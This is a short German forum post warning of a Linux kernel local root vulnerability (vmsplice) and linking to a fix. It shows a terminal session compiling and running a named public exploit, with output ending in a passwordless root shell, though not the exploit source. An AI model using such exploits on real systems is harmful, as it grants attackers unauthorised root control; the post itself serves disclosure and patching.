Seit etwa 17 Std. ist eine Sicherheitsluecke im Linux-Kernel bekannt:
[Links nur für registrierte Nutzer]
Der bug ist nur fuer Debian geloggt - ist aber fuer alle Kernel, einschliesslich 2.6.24 gueltig (Test auf SuSE 10.3):
Upppsss ... root-Shell ohne Passwort!Code:~/TempInstall/BugKernel.11.02.08> vi exploid.c ~/TempInstall/BugKernel.11.02.08> gcc exploid.c -o exploid ~/TempInstall/BugKernel.11.02.08> ./exploid ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x0 .. 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0xb7dcc000 .. 0xb7dfe000 [+] root ~/TempInstall/BugKernel.11.02.08 #
Um diese Sicherheitsluecke zu schliessen:
[Links nur für registrierte Nutzer]